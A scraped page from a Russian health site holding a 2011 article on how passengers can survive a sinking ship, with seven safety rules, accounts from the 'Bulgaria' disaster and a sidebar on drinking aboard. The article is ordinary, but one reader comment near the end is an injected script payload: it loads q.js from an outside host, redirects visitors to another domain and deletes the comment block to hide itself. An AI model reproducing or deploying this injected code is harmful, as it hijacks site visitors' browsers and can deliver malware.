Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что делать, если судно ид...  >>  Что делать, если судно идет ко дну?
 
Обратная связь
 

Что делать, если судно идет ко дну?

Размер шрифта
05 августа 2011 07:00
  • google_analytics: false
  • Нравится

Июль 2011 года запомнится трагическими авариями на воде. 10 числа – «Булгария». Погибли 122 человека. В конце месяца более 10 человек погибли в результате крушений катеров, в том числе и на Москве-реке. Жертв можно было избежать, если бы пассажиры знали, что делать в случае аварии.

1

Александр Тушкин / «Здоровье инфо»

«Мы поняли, что идем ко дну, когда открыли дверь каюты и увидели панику. До последнего было непонятно, где взять спасательные жилеты. Я случайно увидела, что в каюте напротив их достают с верхней полки шкафа», — рассказала РИА Новости пассажирка «Булгарии» Гульназ Миннехаерова. Женщина выплыла через разбитое стекло иллюминатора. Ее муж Ильназ в соседней каюте чудом вытащил годовалую дочку через окно.

Свидетельства очевидцев сводятся к одному: люди были в панике, а экипаж даже не успел отдать распоряжения, как корабль пришел ко дну. Пассажирам пришлось спасаться самим. Причем на судне был полный комплект необходимого оборудования: плоты на 120 человек, 2 спасательные шлюпки на 36 человек, 165 спасательных жилетов и 12 жилетов для детей. Однако ими просто не успели воспользоваться. Уже ненужные шлюпки всплыли на поверхность вместе с мебелью.

Журналисты обратили внимание на тот факт, что из 33 членов команды спаслись 23 человека. И мигом на членов экипажа посыпались обвинения в том, что они не заботились о пассажирах, а просто спасали свои шкуры. Однако эксперты считают, что это не так: капитан «Булгарии» Александр Островский пытался спасти судно до последнего, развернув его на мель. До мели корабль не дотянул 40 м. Тело Островского и его супруги нашли в капитанской рубке.

1

Почему спаслись остальные члены команды? Они просто знали, что нужно делать. А пассажиры не знали, потому что их не проинструктировали. По российским законам сотрудники речного транспорта обязаны провести инструктаж безопасности в течение 24 часов после выхода из порта. На практике моряки «забывают» сделать это. После катастрофы на «Булгарии» ситуация изменится – экипаж будет проводить специальные дополнительные тренинги с пассажирами.

Отсюда правило первое. Воспользуйтесь своим правом и потребуйте у экипажа, чтобы вам продемонстрировали пути кратчайшего отхода с вашей палубы до ближайшего плавсредства (шлюпка или плот), рассказали о расположении спасательных жилетов и способе их применения. Затем самостоятельно изучите план эвакуации, постарайтесь его запомнить, особенно если вы плывете на большом судне, где длинные коридоры могут сбить с толку любого. Пройдите по всем маршрутам самостоятельно несколько раз.

Правило второе. Не спешите покидать судно слишком быстро. Решение об оставлении судна принимает только капитан. Даже в случае с «Булгарией», которая утонула за 2 минуты, капитан успел с помощью рупора отдать последние приказы. Суда могут тонуть очень долго, в течение нескольких часов.

Правило третье. Не паникуйте. Постарайтесь сохранить трезвый рассудок. Возьмите теплую одежду, воду, документы и спасательный жилет. Обувь лучше не снимайте – на полу может оказаться битое стекло. Соберите группу из близких людей и ведите ее к ближайшей спасательной шлюпке. Если судно накренилось, идите в противоположную от крена сторону. Ваша задача – вырваться наружу. Не бегите, не создавайте вокруг дополнительный хаос – его и так хватает на тонущем судне. Если кто-то из вашего окружения начинает паниковать, тут может помочь хорошая пощечина.

1

Правило четвертое. Не надевайте спасательный жилет, если в помещении вода. Это ошибка стоила жизни многим пассажирам «Булгарии». Спасатели находили на корабле трупы в жилетах. Жилет затрудняет движения и не дает возможности поднырнуть и выплыть в дверь или окно, особенно если человек физически слаб. Если вы застряли в помещении, выбейте стекло иллюминатора и выплывайте наружу. Помните, что это ваше последнее средство к спасению.

Йо-хо-хо и бутылка рома
Непросыхающие пираты, сундуки с сокровищами, попугай на плече у боцмана… Сколько мифов у нас сложилось о морских волках! А ведь в реальности дисциплина на пиратских кораблях была еще строже, чем на военных. Во время плавания напиваться запрещалось, а на кое-какие корабли нельзя было вообще проносить бутылки. С уходом парусной эры алкоголь остается главным злом для транспортных сообщений. Источник в «МосРечФлоте» рассказал «Здоровье инфо», что капитан разбившейся в ночь на 31 июля «Ласточки», скорее всего, управлял судном в нетрезвом состоянии. Поэтому мы советуем вам воздержаться от алкогольных возлияний во время плавания. Да и морскую болезнь алкоголь только усугубляет.
 

Правило пятое. Вы вышли на палубу к своему плавсредству. Там вас ожидает закрепленный за шлюпкой член экипажа. Выполняйте все его приказания. Помните морское правило – в шлюпку садятся женщины, дети и пожилые люди. Если места больше нет, прыгайте в воду. Это нужно сделать так: удостоверьтесь, что место приземления безопасно, и прыгайте ногами вперед, зажав нос.

Правило шестое. Отплывите от судна как можно дальше, иначе вас затянет в воронку или травмирует всплывающими предметами. Учебники по ОБЖ считают, что 150-200 м – это безопасная дистанция. Однако после аварии пересечь вплавь более 50 м не получается даже у хороших пловцов. Поэтому вам нужно как можно скорее попасть на плавсредство – плот или шлюпку. Увидев лодку, в которой имеются свободные места, подплывайте к ней с кормы, не наваливайтесь на борт.

Правило седьмое. Если вы находитесь в воде, то не плывите. Это главная ошибка утопающих. Плыть не нужно, так как вы быстро теряете энергию и тепло. Тем более спасателям будет труднее вас искать. Постарайтесь уцепиться за обломок и дрейфовать.

Приведенные выше правила универсальны и применимы для аварий как на речном, так и на морском транспорте.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Спасение утопающих – дело рук самих утопающих   Вся правда об острой кишечной инфекции   Как пережить жару дома   Лучшая природная вода для здоровья  
02 мая 2013Чем мыть ребенка, чтобы не испортить его кожу 12 апреля 2013Ученые выяснили, из каких кружек лучше пить
 
20 марта 2013А вы знаете, почему пальцы сморщиваются после пребывания в воде 21 декабря 2012Сладкая вода помогает сконцентрироваться
 

Слайдшоу

1
Как пережить жару без кондиционера?!
Как есть и худеть?
Что съесть, чтобы похудеть после 40?

Тесты

1
Что вы знаете о воде?
Есть ли у вас избыточный вес?
Цистит: как с ним бороться
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.